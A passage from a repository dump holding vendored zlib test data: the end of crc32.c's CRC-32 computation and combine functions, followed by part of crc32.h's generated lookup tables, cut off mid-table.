^= crc_braid_big_table[k][(word2 >> (k << 3)) & 0xff]; #if N > 3 crc3 ^= crc_braid_big_table[k][(word3 >> (k << 3)) & 0xff]; #if N > 4 crc4 ^= crc_braid_big_table[k][(word4 >> (k << 3)) & 0xff]; #if N > 5 crc5 ^= crc_braid_big_table[k][(word5 >> (k << 3)) & 0xff]; #endif #endif #endif #endif #endif } } /* Process the last block, combining the CRCs of the N braids at the same time. */ comb = crc_word_big(crc0 ^ words[0]); #if N > 1 comb = crc_word_big(crc1 ^ words[1] ^ comb); #if N > 2 comb = crc_word_big(crc2 ^ words[2] ^ comb); #if N > 3 comb = crc_word_big(crc3 ^ words[3] ^ comb); #if N > 4 comb = crc_word_big(crc4 ^ words[4] ^ comb); #if N > 5 comb = crc_word_big(crc5 ^ words[5] ^ comb); #endif #endif #endif #endif #endif words += N; crc = byte_swap(comb); } /* Update the pointer to the remaining bytes to process. */ buf = (unsigned char const *)words; } #endif /* W */ /* Complete the computation of the CRC on any remaining bytes. */ while (len >= 8) { len -= 8; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; } while (len) { len--; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; } /* Return the CRC, post-conditioned. */ return crc ^ 0xffffffff; } #endif /* ========================================================================= */ unsigned long ZEXPORT crc32(unsigned long crc, const unsigned char FAR *buf, uInt len) { return crc32_z(crc, buf, len); } /* ========================================================================= */ uLong ZEXPORT crc32_combine64(uLong crc1, uLong crc2, z_off64_t len2) { #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ return multmodp(x2nmodp(len2, 3), crc1) ^ (crc2 & 0xffffffff); } /* ========================================================================= */ uLong ZEXPORT crc32_combine(uLong crc1, uLong crc2, z_off_t len2) { return crc32_combine64(crc1, crc2, (z_off64_t)len2); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_gen64(z_off64_t len2) { #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ return x2nmodp(len2, 3); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_gen(z_off_t len2) { return crc32_combine_gen64((z_off64_t)len2); } /* ========================================================================= */ uLong ZEXPORT crc32_combine_op(uLong crc1, uLong crc2, uLong op) { return multmodp(op, crc1) ^ (crc2 & 0xffffffff); } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/crc32.h ================================================ /* crc32.h -- tables for rapid CRC calculation * Generated automatically by crc32.c */ local const z_crc_t FAR crc_table[] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d}; #ifdef W #if W == 8 local const z_word_t FAR crc_big_table[] = { 0x0000000000000000, 0x9630077700000000, 0x2c610eee00000000, 0xba51099900000000, 0x19c46d0700000000, 0x8ff46a7000000000, 0x35a563e900000000, 0xa395649e00000000, 0x3288db0e00000000, 0xa4b8dc7900000000, 0x1ee9d5e000000000, 0x88d9d29700000000, 0x2b4cb60900000000, 0xbd7cb17e00000000, 0x072db8e700000000, 0x911dbf9000000000, 0x6410b71d00000000, 0xf220b06a00000000, 0x4871b9f300000000, 0xde41be8400000000, 0x7dd4da1a00000000, 0xebe4dd6d00000000, 0x51b5d4f400000000, 0xc785d38300000000, 0x56986c1300000000, 0xc0a86b6400000000, 0x7af962fd00000000, 0xecc9658a00000000, 0x4f5c011400000000, 0xd96c066300000000, 0x633d0ffa00000000, 0xf50d088d00000000, 0xc8206e3b00000000, 0x5e10694c00000000, 0xe44160d500000000, 0x727167a200000000, 0xd1e4033c00000000, 0x47d4044b00000000, 0xfd850dd200000000, 0x6bb50aa500000000, 0xfaa8b53500000000, 0x6c98b24200000000, 0xd6c9bbdb00000000, 0x40f9bcac00000000, 0xe36cd83200000000, 0x755cdf4500000000, 0xcf0dd6dc00000000, 0x593dd1ab00000000, 0xac30d92600000000, 0x3a00de5100000000, 0x8051d7c800000000, 0x1661d0bf00000000, 0xb5f4b42100000000, 0x23c4b35600000000, 0x9995bacf00000000, 0x0fa5bdb800000000, 0x9eb8022800000000, 0x0888055f00000000, 0xb2d90cc600000000, 0x24e90bb100000000, 0x877c6f2f00000000, 0x114c685800000000, 0xab1d61c100000000, 0x3d2d66b600000000, 0x9041dc7600000000, 0x0671db0100000000, 0xbc20d29800000000, 0x2a10d5ef00000000, 0x8985b17100000000, 0x1fb5b60600000000, 0xa5e4bf9f00000000, 0x33d4b8e800000000, 0xa2c9077800000000, 0x34f9000f00000000, 0x8ea8099600000000, 0x18980ee100000000, 0xbb0d6a7f00000000, 0x2d3d6d0800000000, 0x976c649100000000, 0x015c63e600000000, 0xf4516b6b00000000, 0x62616c1c00000000, 0xd830658500000000, 0x4e0062f200000000, 0xed95066c00000000, 0x7ba5011b00000000, 0xc1f4088200000000, 0x57c40ff500000000, 0xc6d9b06500000000, 0x50e9b71200000000, 0xeab8be8b00000000, 0x7c88b9fc00000000, 0xdf1ddd6200000000, 0x492dda1500000000, 0xf37cd38c00000000, 0x654cd4fb00000000, 0x5861b24d00000000, 0xce51b53a00000000, 0x7400bca300000000, 0xe230bbd400000000, 0x41a5df4a00000000, 0xd795d83d00000000, 0x6dc4d1a400000000, 0xfbf4d6d300000000, 0x6ae9694300000000, 0xfcd96e3400000000, 0x468867ad00000000, 0xd0b860da00000000, 0x732d044400000000, 0xe51d033300000000, 0x5f4c0aaa00000000, 0xc97c0ddd00000000, 0x3c71055000000000, 0xaa41022700000000, 0x10100bbe00000000, 0x86200cc900000000, 0x25b5685700000000, 0xb3856f2000000000, 0x09d466b900000000, 0x9fe461ce00000000, 0x0ef9de5e00000000, 0x98c9d92900000000, 0x2298d0b000000000, 0xb4a8d7c700000000, 0x173db35900000000, 0x810db42e00000000, 0x3b5cbdb700000000, 0xad6cbac000000000, 0x2083b8ed00000000, 0xb6b3bf9a00000000, 0x0ce2b60300000000, 0x9ad2b17400000000, 0x3947d5ea00000000, 0xaf77d29d00000000, 0x1526db0400000000, 0x8316dc7300000000, 0x120b63e300000000, 0x843b649400000000, 0x3e6a6d0d00000000, 0xa85a6a7a00000000, 0x0bcf0ee400000000, 0x9dff099300000000, 0x27ae000a00000000, 0xb19e077d00000000, 0x44930ff000000000, 0xd2a3088700000000, 0x68f2011e00000000, 0xfec2066900000000, 0x5d5762f700000000, 0xcb67658000000000, 0x71366c1900000000, 0xe7066b6e00000000, 0x761bd4fe00000000, 0xe02bd38900000000, 0x5a7ada1000000000, 0xcc4add6700000000, 0x6fdfb9f900000000, 0xf9efbe8e00000000, 0x43beb71700000000, 0xd58eb06000000000, 0xe8a3d6d600000000, 0x7e93d1a100000000, 0xc4c2d83800000000, 0x52f2df4f00000000, 0xf167bbd100000000, 0x6757bca600000000, 0xdd06b53f00000000, 0x4b36b24800000000, 0xda2b0dd800000000, 0x4c1b0aaf00000000, 0xf64a033600000000, 0x607a044100000000, 0xc3ef60df00000000, 0x55df67a800000000, 0xef8e6e3100000000, 0x79be694600000000, 0x8cb361cb00000000, 0x1a8366bc00000000, 0xa0d26f2500000000, 0x36e2685200000000, 0x95770ccc00000000, 0x03470bbb00000000, 0xb916022200000000, 0x2f26055500000000, 0xbe3bbac500000000, 0x280bbdb200000000, 0x925ab42b00000000, 0x046ab35c00000000, 0xa7ffd7c200000000, 0x31cfd0b500000000, 0x8b9ed92c00000000, 0x1daede5b00000000, 0xb0c2649b00000000, 0x26f263ec00000000, 0x9ca36a7500000000, 0x0a936d0200000000, 0xa906099c00000000, 0x3f360eeb00000000, 0x8567077200000000, 0x1357000500000000, 0x824abf9500000000, 0x147ab8e200000000, 0xae2bb17b00000000, 0x381bb60c00000000, 0x9b8ed29200000000, 0x0dbed5e500000000, 0xb7efdc7c00000000, 0x21dfdb0b00000000, 0xd4d2d38600000000, 0x42e2d4f100000000, 0xf8b3dd6800000000, 0x6e83da1f00000000, 0xcd16be8100000000, 0x5b26b9f600000000, 0xe177b06f00000000, 0x7747b71800000000, 0xe65a088800000000, 0x706a0fff00000000, 0xca3b066600000000, 0x5c0b011100000000, 0xff9e658f00000000, 0x69ae62f800000000, 0xd3ff6b6100000000, 0x45cf6c1600000000, 0x78e20aa000000000, 0xeed20dd700000000, 0x5483044e00000000, 0xc2b3033900000000, 0x612667a700000000, 0xf71660d000000000, 0x4d47694900000000, 0xdb776e3e00000000, 0x4a6ad1ae00000000, 0xdc5ad6d900000000, 0x660bdf4000000000, 0xf03bd83700000000, 0x53aebca900000000, 0xc59ebbde00000000, 0x7fcfb24700000000, 0xe9ffb53000000000, 0x1cf2bdbd00000000, 0x8ac2baca00000000, 0x3093b35300000000, 0xa6a3b42400000000, 0x0536d0ba00000000, 0x9306d7cd00000000, 0x2957de5400000000, 0xbf67d92300000000, 0x2e7a66b300000000, 0xb84a61c400000000, 0x021b685d00000000, 0x942b6f2a00000000, 0x37be0bb400000000, 0xa18e0cc300000000, 0x1bdf055a00000000, 0x8def022d00000000}; #else /* W == 4 */ local const z_word_t FAR crc_big_table[] = { 0x00000000, 0x96300777, 0x2c610eee, 0xba510999, 0x19c46d07, 0x8ff46a70, 0x35a563e9, 0xa395649e, 0x3288db0e, 0xa4b8dc79, 0x1ee9d5e0, 0x88d9d297, 0x2b4cb609, 0xbd7cb17e, 0x072db8e7, 0x911dbf90, 0x6410b71d, 0xf220b06a, 0x4871b9f3, 0xde41be84, 0x7dd4da1a, 0xebe4dd6d, 0x51b5d4f4, 0xc785d383, 0x56986c13, 0xc0a86b64, 0x7af962fd, 0xecc9658a, 0x4f5c0114, 0xd96c0663, 0x633d0ffa, 0xf50d088d, 0xc8206e3b, 0x5e10694c, 0xe44160d5, 0x727167a2, 0xd1e4033c, 0x47d4044b, 0xfd850dd2, 0x6bb50aa5, 0xfaa8b535, 0x6c98b242, 0xd6c9bbdb, 0x40f9bcac, 0xe36cd832, 0x755cdf45, 0xcf0dd6dc, 0x593dd1ab, 0xac30d926, 0x3a00de51, 0x8051d7c8, 0x1661d0bf, 0xb5f4b421, 0x23c4b356, 0x9995bacf, 0x0fa5bdb8, 0x9eb80228, 0x0888055f, 0xb2d90cc6, 0x24e90bb1, 0x877c6f2f, 0x114c6858, 0xab1d61c1, 0x3d2d66b6, 0x9041dc76, 0x0671db01, 0xbc20d298, 0x2a10d5ef, 0x8985b171, 0x1fb5b606, 0xa5e4bf9f, 0x33d4b8e8, 0xa2c90778, 0x34f9000f, 0x8ea80996, 0x18980ee1, 0xbb0d6a7f, 0x2d3d6d08, 0x976c6491, 0x015c63e6, 0xf4516b6b, 0x62616c1c, 0xd8306585, 0x4e0062f2, 0xed95066c, 0x7ba5011b, 0xc1f40882, 0x57c40ff5, 0xc6d9b065, 0x50e9b712, 0xeab8be8b, 0x7c88b9fc, 0xdf1ddd62, 0x492dda15, 0xf37cd38c, 0x654cd4fb, 0x5861b24d, 0xce51b53a, 0x7400bca3, 0xe230bbd4, 0x41a5df4a, 0xd795d83d, 0x6dc4d1a4, 0xfbf4d6d3, 0x6ae96943, 0xfcd96e34, 0x468867ad, 0xd0b860da, 0x732d0444, 0xe51d0333, 0x5f4c0aaa, 0xc97c0ddd, 0x3c710550, 0xaa410227, 0x10100bbe, 0x86200cc9, 0x25b56857, 0xb3856f20, 0x09d466b9, 0x9fe461ce, 0x0ef9de5e, 0x98c9d929, 0x2298d0b0, 0xb4a8d7c7, 0x173db359, 0x810db42e, 0x3b5cbdb7, 0xad6cbac0, 0x2083b8ed, 0xb6b3bf9a, 0x0ce2b603, 0x9ad2b174, 0x3947d5ea, 0xaf77d29d, 0x1526db04, 0x8316dc73, 0x120b63e3, 0x843b6494, 0x3e6a6d0d, 0xa85a6a7a, 0x0bcf0ee4, 0x9dff0993, 0x27ae000a, 0xb19e077d, 0x44930ff0, 0xd2a30887, 0x68f2011e, 0xfec20669, 0x5d5762f7, 0xcb676580, 0x71366c19, 0xe7066b6e, 0x761bd4fe, 0xe02bd389, 0x5a7ada10, 0xcc4add67, 0x6fdfb9f9, 0xf9efbe8e, 0x43beb717, 0xd58eb060, 0xe8a3d6d6, 0x7e93d1a1, 0xc4c2d838, 0x52f2df4f, 0xf167bbd1, 0x6757bca6, 0xdd06b53f, 0x4b36b248, 0xda2b0dd8, 0x4c1b0aaf, 0xf64a0336, 0x607a0441, 0xc3ef60df, 0x55df67a8, 0xef8e6e31, 0x79be6946, 0x8cb361cb, 0x1a8366bc, 0xa0d26f25, 0x36e26852, 0x95770ccc, 0x03470bbb, 0xb9160222, 0x2f260555, 0xbe3bbac5, 0x280bbdb2, 0x925ab42b, 0x046ab35c, 0xa7ffd7c2, 0x31cfd0b5, 0x8b9ed92c, 0x1daede5b, 0xb0c2649b, 0x26f263ec, 0x9ca36a75, 0x0a936d02, 0xa906099c, 0x3f360eeb, 0x85670772, 0x13570005, 0x824abf95, 0x147ab8e2, 0xae2bb17b, 0x381bb60c, 0x9b8ed292, 0x0dbed5e5, 0xb7efdc7c, 0x21dfdb0b, 0xd4d2d386, 0x42e2d4f1, 0xf8b3dd68, 0x6e83da1f, 0xcd16be81, 0x5b26b9f6, 0xe177b06f, 0x7747b718, 0xe65a0888, 0x706a0fff, 0xca3b0666, 0x5c0b0111, 0xff9e658f, 0x69ae62f8, 0xd3ff6b61, 0x45cf6c16, 0x78e20aa0, 0xeed20dd7, 0x5483044e, 0xc2b30339, 0x612667a7, 0xf71660d0, 0x4d476949, 0xdb776e3e, 0x4a6ad1ae, 0xdc5ad6d9, 0x660bdf40, 0xf03bd837, 0x53aebca9, 0xc59ebbde, 0x7fcfb247, 0xe9ffb530, 0x1cf2bdbd, 0x8ac2baca, 0x3093b353, 0xa6a3b424, 0x0536d0ba, 0x9306d7cd, 0x2957de54, 0xbf67d923, 0x2e7a66b3, 0xb84a61c4, 0x021b685d, 0x942b6f2a, 0x37be0bb4, 0xa18e0cc3, 0x1bdf055a, 0x8def022d}; #endif #if N == 1 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xccaa009e, 0x4225077d, 0x8e8f07e3, 0x844a0efa, 0x48e00e64, 0xc66f0987, 0x0ac50919, 0xd3e51bb5, 0x1f4f1b2b, 0x91c01cc8, 0x5d6a1c56, 0x57af154f, 0x9b0515d1, 0x158a1232, 0xd92012ac, 0x7cbb312b, 0xb01131b5, 0x3e9e3656, 0xf23436c8, 0xf8f13fd1, 0x345b3f4f, 0xbad438ac, 0x767e3832, 0xaf5e2a9e, 0x63f42a00, 0xed7b2de3, 0x21d12d7d, 0x2b142464, 0xe7be24fa, 0x69312319, 0xa59b2387, 0xf9766256, 0x35dc62c8, 0xbb53652b, 0x77f965b5, 0x7d3c6cac, 0xb1966c32, 0x3f196bd1, 0xf3b36b4f, 0x2a9379e3, 0xe639797d, 0x68b67e9e, 0xa41c7e00, 0xaed97719, 0x62737787, 0xecfc7064, 0x205670fa, 0x85cd537d, 0x496753e3, 0xc7e85400, 0x0b42549e, 0x01875d87, 0xcd2d5d19, 0x43a25afa, 0x8f085a64, 0x562848c8, 0x9a824856, 0x140d4fb5, 0xd8a74f2b, 0xd2624632, 0x1ec846ac, 0x9047414f, 0x5ced41d1, 0x299dc2ed, 0xe537c273, 0x6bb8c590, 0xa712c50e, 0xadd7cc17, 0x617dcc89, 0xeff2cb6a, 0x2358cbf4, 0xfa78d958, 0x36d2d9c6, 0xb85dde25, 0x74f7debb, 0x7e32d7a2, 0xb298d73c, 0x3c17d0df, 0xf0bdd041, 0x5526f3c6, 0x998cf358, 0x1703f4bb, 0xdba9f425, 0xd16cfd3c, 0x1dc6fda2, 0x9349fa41, 0x5fe3fadf, 0x86c3e873, 0x4a69e8ed, 0xc4e6ef0e, 0x084cef90, 0x0289e689, 0xce23e617, 0x40ace1f4, 0x8c06e16a, 0xd0eba0bb, 0x1c41a025, 0x92cea7c6, 0x5e64a758, 0x54a1ae41, 0x980baedf, 0x1684a93c, 0xda2ea9a2, 0x030ebb0e, 0xcfa4bb90, 0x412bbc73, 0x8d81bced, 0x8744b5f4, 0x4beeb56a, 0xc561b289, 0x09cbb217, 0xac509190, 0x60fa910e, 0xee7596ed, 0x22df9673, 0x281a9f6a, 0xe4b09ff4, 0x6a3f9817, 0xa6959889, 0x7fb58a25, 0xb31f8abb, 0x3d908d58, 0xf13a8dc6, 0xfbff84df, 0x37558441, 0xb9da83a2, 0x7570833c, 0x533b85da, 0x9f918544, 0x111e82a7, 0xddb48239, 0xd7718b20, 0x1bdb8bbe, 0x95548c5d, 0x59fe8cc3, 0x80de9e6f, 0x4c749ef1, 0xc2fb9912, 0x0e51998c, 0x04949095, 0xc83e900b, 0x46b197e8, 0x8a1b9776, 0x2f80b4f1, 0xe32ab46f, 0x6da5b38c, 0xa10fb312, 0xabcaba0b, 0x6760ba95, 0xe9efbd76, 0x2545bde8, 0xfc65af44, 0x30cfafda, 0xbe40a839, 0x72eaa8a7, 0x782fa1be, 0xb485a120, 0x3a0aa6c3, 0xf6a0a65d, 0xaa4de78c, 0x66e7e712, 0xe868e0f1, 0x24c2e06f, 0x2e07e976, 0xe2ade9e8, 0x6c22ee0b, 0xa088ee95, 0x79a8fc39, 0xb502fca7, 0x3b8dfb44, 0xf727fbda, 0xfde2f2c3, 0x3148f25d, 0xbfc7f5be, 0x736df520, 0xd6f6d6a7, 0x1a5cd639, 0x94d3d1da, 0x5879d144, 0x52bcd85d, 0x9e16d8c3, 0x1099df20, 0xdc33dfbe, 0x0513cd12, 0xc9b9cd8c, 0x4736ca6f, 0x8b9ccaf1, 0x8159c3e8, 0x4df3c376, 0xc37cc495, 0x0fd6c40b, 0x7aa64737, 0xb60c47a9, 0x3883404a, 0xf42940d4, 0xfeec49cd, 0x32464953, 0xbcc94eb0, 0x70634e2e, 0xa9435c82, 0x65e95c1c, 0xeb665bff, 0x27cc5b61, 0x2d095278, 0xe1a352e6, 0x6f2c5505, 0xa386559b, 0x061d761c, 0xcab77682, 0x44387161, 0x889271ff, 0x825778e6, 0x4efd7878, 0xc0727f9b, 0x0cd87f05, 0xd5f86da9, 0x19526d37, 0x97dd6ad4, 0x5b776a4a, 0x51b26353, 0x9d1863cd, 0x1397642e, 0xdf3d64b0, 0x83d02561, 0x4f7a25ff, 0xc1f5221c, 0x0d5f2282, 0x079a2b9b, 0xcb302b05, 0x45bf2ce6, 0x89152c78, 0x50353ed4, 0x9c9f3e4a, 0x121039a9, 0xdeba3937, 0xd47f302e, 0x18d530b0, 0x965a3753, 0x5af037cd, 0xff6b144a, 0x33c114d4, 0xbd4e1337, 0x71e413a9, 0x7b211ab0, 0xb78b1a2e, 0x39041dcd, 0xf5ae1d53, 0x2c8e0fff, 0xe0240f61, 0x6eab0882, 0xa201081c, 0xa8c40105, 0x646e019b, 0xeae10678, 0x264b06e6}, {0x00000000, 0xa6770bb4, 0x979f1129, 0x31e81a9d, 0xf44f2413, 0x52382fa7, 0x63d0353a, 0xc5a73e8e, 0x33ef4e67, 0x959845d3, 0xa4705f4e, 0x020754fa, 0xc7a06a74, 0x61d761c0, 0x503f7b5d, 0xf64870e9, 0x67de9cce, 0xc1a9977a, 0xf0418de7, 0x56368653, 0x9391b8dd, 0x35e6b369, 0x040ea9f4, 0xa279a240, 0x5431d2a9, 0xf246d91d, 0xc3aec380, 0x65d9c834, 0xa07ef6ba, 0x0609fd0e, 0x37e1e793, 0x9196ec27, 0xcfbd399c, 0x69ca3228, 0x582228b5, 0xfe552301, 0x3bf21d8f, 0x9d85163b, 0xac6d0ca6, 0x0a1a0712, 0xfc5277fb, 0x5a257c4f, 0x6bcd66d2, 0xcdba6d66, 0x081d53e8, 0xae6a585c, 0x9f8242c1, 0x39f54975, 0xa863a552, 0x0e14aee6, 0x3ffcb47b, 0x998bbfcf, 0x5c2c8141, 0xfa5b8af5, 0xcbb39068, 0x6dc49bdc, 0x9b8ceb35, 0x3dfbe081, 0x0c13fa1c, 0xaa64f1a8, 0x6fc3cf26, 0xc9b4c492, 0xf85cde0f, 0x5e2bd5bb, 0x440b7579, 0xe27c7ecd, 0xd3946450, 0x75e36fe4, 0xb044516a, 0x16335ade, 0x27db4043, 0x81ac4bf7, 0x77e43b1e, 0xd19330aa, 0xe07b2a37, 0x460c2183, 0x83ab1f0d, 0x25dc14b9, 0x14340e24, 0xb2430590, 0x23d5e9b7, 0x85a2e203, 0xb44af89e, 0x123df32a, 0xd79acda4, 0x71edc610, 0x4005dc8d, 0xe672d739, 0x103aa7d0, 0xb64dac64, 0x87a5b6f9, 0x21d2bd4d, 0xe47583c3, 0x42028877, 0x73ea92ea, 0xd59d995e, 0x8bb64ce5, 0x2dc14751, 0x1c295dcc, 0xba5e5678, 0x7ff968f6, 0xd98e6342, 0xe86679df, 0x4e11726b, 0xb8590282, 0x1e2e0936, 0x2fc613ab, 0x89b1181f, 0x4c162691, 0xea612d25, 0xdb8937b8, 0x7dfe3c0c, 0xec68d02b, 0x4a1fdb9f, 0x7bf7c102, 0xdd80cab6, 0x1827f438, 0xbe50ff8c, 0x8fb8e511, 0x29cfeea5, 0xdf879e4c, 0x79f095f8, 0x48188f65, 0xee6f84d1, 0x2bc8ba5f, 0x8dbfb1eb, 0xbc57ab76, 0x1a20a0c2, 0x8816eaf2, 0x2e61e146, 0x1f89fbdb, 0xb9fef06f, 0x7c59cee1, 0xda2ec555, 0xebc6dfc8, 0x4db1d47c, 0xbbf9a495, 0x1d8eaf21, 0x2c66b5bc, 0x8a11be08, 0x4fb68086, 0xe9c18b32, 0xd82991af, 0x7e5e9a1b, 0xefc8763c, 0x49bf7d88, 0x78576715, 0xde206ca1, 0x1b87522f, 0xbdf0599b, 0x8c184306, 0x2a6f48b2, 0xdc27385b, 0x7a5033ef, 0x4bb82972, 0xedcf22c6, 0x28681c48, 0x8e1f17fc, 0xbff70d61, 0x198006d5, 0x47abd36e, 0xe1dcd8da, 0xd034c247, 0x7643c9f3, 0xb3e4f77d, 0x1593fcc9, 0x247be654, 0x820cede0, 0x74449d09, 0xd23396bd, 0xe3db8c20, 0x45ac8794, 0x800bb91a, 0x267cb2ae, 0x1794a833, 0xb1e3a387, 0x20754fa0, 0x86024414, 0xb7ea5e89, 0x119d553d, 0xd43a6bb3, 0x724d6007, 0x43a57a9a, 0xe5d2712e, 0x139a01c7, 0xb5ed0a73, 0x840510ee, 0x22721b5a, 0xe7d525d4, 0x41a22e60, 0x704a34fd, 0xd63d3f49, 0xcc1d9f8b, 0x6a6a943f, 0x5b828ea2, 0xfdf58516, 0x3852bb98, 0x9e25b02c, 0xafcdaab1, 0x09baa105, 0xfff2d1ec, 0x5985da58, 0x686dc0c5, 0xce1acb71, 0x0bbdf5ff, 0xadcafe4b, 0x9c22e4d6, 0x3a55ef62, 0xabc30345, 0x0db408f1, 0x3c5c126c, 0x9a2b19d8, 0x5f8c2756, 0xf9fb2ce2, 0xc813367f, 0x6e643dcb, 0x982c4d22, 0x3e5b4696, 0x0fb35c0b, 0xa9c457bf, 0x6c636931, 0xca146285, 0xfbfc7818, 0x5d8b73ac, 0x03a0a617, 0xa5d7ada3, 0x943fb73e, 0x3248bc8a, 0xf7ef8204, 0x519889b0, 0x6070932d, 0xc6079899, 0x304fe870, 0x9638e3c4, 0xa7d0f959, 0x01a7f2ed, 0xc400cc63, 0x6277c7d7, 0x539fdd4a, 0xf5e8d6fe, 0x647e3ad9, 0xc209316d, 0xf3e12bf0, 0x55962044, 0x90311eca, 0x3646157e, 0x07ae0fe3, 0xa1d90457, 0x579174be, 0xf1e67f0a, 0xc00e6597, 0x66796e23, 0xa3de50ad, 0x05a95b19, 0x34414184, 0x92364a30}, {0x00000000, 0xcb5cd3a5, 0x4dc8a10b, 0x869472ae, 0x9b914216, 0x50cd91b3, 0xd659e31d, 0x1d0530b8, 0xec53826d, 0x270f51c8, 0xa19b2366, 0x6ac7f0c3, 0x77c2c07b, 0xbc9e13de, 0x3a0a6170, 0xf156b2d5, 0x03d6029b, 0xc88ad13e, 0x4e1ea390, 0x85427035, 0x9847408d, 0x531b9328, 0xd58fe186, 0x1ed33223, 0xef8580f6, 0x24d95353, 0xa24d21fd, 0x6911f258, 0x7414c2e0, 0xbf481145, 0x39dc63eb, 0xf280b04e, 0x07ac0536, 0xccf0d693, 0x4a64a43d, 0x81387798, 0x9c3d4720, 0x57619485, 0xd1f5e62b, 0x1aa9358e, 0xebff875b, 0x20a354fe, 0xa6372650, 0x6d6bf5f5, 0x706ec54d, 0xbb3216e8, 